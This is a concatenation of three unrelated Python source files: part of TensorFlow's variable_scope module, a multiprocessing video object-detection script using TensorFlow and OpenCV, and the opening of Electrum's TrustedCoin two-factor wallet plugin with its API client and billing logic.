behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
this argument is always forced to be tf.AUTO_REUSE.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't touch name scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if self._graph_context_manager is not None:
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export("variable_op_scope")
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _compute_slice_dim_and_shape(full_shape, slicing):
"""Computes which dimension is being sliced and the typical slice shape."""
slice_shape = [0] * len(full_shape)
slice_dim = None
for dim, num_slices in enumerate(slicing):
dim_size = full_shape[dim]
if num_slices <= 0 or dim_size < num_slices:
raise ValueError("Cannot create %d slices for size %d. shape: %s, "
"slicing: %s" %
(num_slices, full_shape[dim], full_shape, slicing))
if num_slices == 1:
# Not slicing in this dimension.
slice_shape[dim] = dim_size
elif slice_dim is not None:
# We only support slicing along one of the dimensions.
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, slicing: %s" % (full_shape, slicing))
else:
# Note: We will add any extras onto the last slice, later.
slice_dim = dim
slice_shape[dim] = dim_size // num_slices
# Degenerate case: If "slicing" was all ones, pretend we are slicing along
# the first dimension.
if slice_dim is None:
slice_dim = 0
return slice_dim, slice_shape
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", True)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
dtype = kwargs.get("dtype", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource or (use_resource is None and context.executing_eagerly()):
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint)
elif not use_resource and context.executing_eagerly():
raise RuntimeError(
"VariableScope should use resource variable when eager execution is"
" enabled, but use_resource is False."
)
else:
return variables.Variable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint)
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
def variable(initial_value=None,
trainable=True,
collections=None,
validate_shape=True,
caching_device=None,
name=None,
dtype=None,
constraint=None,
use_resource=None):
previous_getter = lambda **kwargs: default_variable_creator(None, **kwargs)
for getter in ops.get_default_graph()._variable_creator_stack: # pylint: disable=protected-access
previous_getter = _make_getter(getter, previous_getter)
return previous_getter(initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name, dtype=dtype,
constraint=constraint,
use_resource=use_resource)
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
object_detection_tf_multiprocessing.py
|
import os
import tarfile
import tensorflow as tf
import multiprocessing
from multiprocessing import Queue
import time
import argparse
import logging
import numpy as np
import cv2
from myutil import downloadutil, fps_measure, queue_seq
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-v', '--video', type=str, required=True,
help="video file for detection")
arg_parser.add_argument('-p', "--process", type=int, default=1,
help="# of detection process")
args = arg_parser.parse_args()
# What model to download.
# MODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_08'
MODEL_NAME = 'ssd_mobilenet_v1_coco_11_06_2017'
def load_graph(model_name=MODEL_NAME):
MODEL_FILE = model_name + '.tar.gz'
DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = model_name + '/frozen_inference_graph.pb'
downloadutil.maybe_download(os.getcwd(), MODEL_FILE,
DOWNLOAD_BASE+MODEL_FILE)
tar_file = tarfile.open(MODEL_FILE)
for file in tar_file.getmembers():
file_name = os.path.basename(file.name)
if 'frozen_inference_graph.pb' in file_name:
tar_file.extract(file, os.getcwd())
# load graph
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return detection_graph
NUM_CLASSES = 90
def load_label_map(label_map_name, num_class):
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join('data', label_map_name)
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map,
max_num_classes=num_class, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
return category_index
def detect_object(detection_graph, sess, image, category_index):
with detection_graph.as_default():
with sess.as_default() as sess:
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# image = Image.open(image_path)
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
# image_np = load_image_into_numpy_array(image)
image_np = image
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
test_var = tf.placeholder(dtype=tf.int8, shape=[])
# Actual detection.
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores, detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index,
use_normalized_coordinates=True,
line_thickness=8,
min_score_thresh = 0.7)
return image_np
detection_graph = load_graph(model_name=MODEL_NAME)
category_index = load_label_map(label_map_name='mscoco_label_map.pbtxt', num_class=NUM_CLASSES)
image_q = Queue(maxsize=200)
processed_q = queue_seq.Queue_Seq(maxsize=200)
#a process that put imge into image_q
def image_worker(image_q, video_file):
logging.info("image worker start")
video_capture = cv2.VideoCapture(video_file)
ret, frame = video_capture.read()
if not ret:
logging.error("Can not read video file, please check!!!!")
frame_count = 0
while ret:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
image_q.put((frame_count, frame))
logging.debug("put image into queue")
ret, frame = video_capture.read()
frame_count += 1
video_capture.release()
input_process = multiprocessing.Process(target=image_worker, args=(image_q, args.video))
# a process to do the detection_graph
def object_detection_worker(image_q, processed_q, detection_graph, category_index, fps=None):
print("detection worker start")
gpu_options = tf.GPUOptions(allow_growth=True)
config = tf.ConfigProto(gpu_options=gpu_options)
sess = tf.Session(graph=detection_graph, config=config)
while True:
frame_count, frame = image_q.get()
t = time.time()
ann_image = detect_object(detection_graph, sess, frame, category_index)
ann_image = cv2.cvtColor(ann_image, cv2.COLOR_RGB2BGR)
if fps:
fps.add_frame()
processed_q.put((frame_count, ann_image))
def main():
# configure logger
logging.basicConfig(
level=logging.INFO,
)
# setup fps counter
fps = fps_measure.FPS()
fps.start_count()
detector_process = [multiprocessing.Process(target=object_detection_worker,
args=(image_q, processed_q, detection_graph, category_index, fps))
for i in range(args.process)]
input_process.start()
for p in detector_process:
p.start()
last_frame = -1
while True:
frame_count, ann_image = processed_q.get()
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(ann_image, 'FPS:{}'.format(int(fps.get_fps())), (50, 50), font, 2, (255, 255, 255), 2, cv2.LINE_AA)
# check frame order
if last_frame != -1:
if last_frame +1 != frame_count:
cv2.putText(ann_image, "Frame order error", (100,100), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
last_frame = frame_count
cv2.imshow('frame', ann_image)
# print("fps is:", fps.get_fps())
if cv2.waitKey(1) & 0xFF == ord('q'):
break
input_process.terminate()
for p in detector_process:
p.terminate()
input_process.join()
for p in detector_process:
p.join()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union, Sequence, List
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, bitcoin
from electrum.bip32 import BIP32Node, xpub_type
from electrum.crypto import sha256
from electrum.transaction import PartialTxOutput, PartialTxInput, PartialTransaction, Transaction
from electrum.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import StorageEncryptionVersion
from electrum.network import Network
from electrum.base_wizard import BaseWizard, WizardWalletPasswordSetting
from electrum.logging import Logger
from .legacy_tx_format import serialize_tx_in_legacy_format
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
plugin: 'TrustedCoinPlugin'
wallet_type = '2fa'
def __init__(self, db, *, config):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, db, config=config)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.db.get('trustedcoin_billing_addresses', {}),
'segwit': self.db.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.db)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self):
default = self.min_prepay()
n = self.config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay()
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, *, coins: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], fee=None,
change_addr: str = None, is_sweep=False) -> PartialTransaction:
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins=coins, outputs=o, fee=fee, change_addr=change_addr)
extra_fee = self.extra_fee() if not is_sweep else 0
if extra_fee:
address = self.billing_info['billing_address_segwit']
fee_output = PartialTxOutput.from_address_and_value(address, extra_fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= extra_fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx: PartialTransaction, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = serialize_tx_in_legacy_format(tx, wallet=self)
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
received_raw_tx = r.get('transaction')
received_tx = Transaction(received_raw_tx)
tx.combine_with_other_psbt(received_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.db.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.db.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
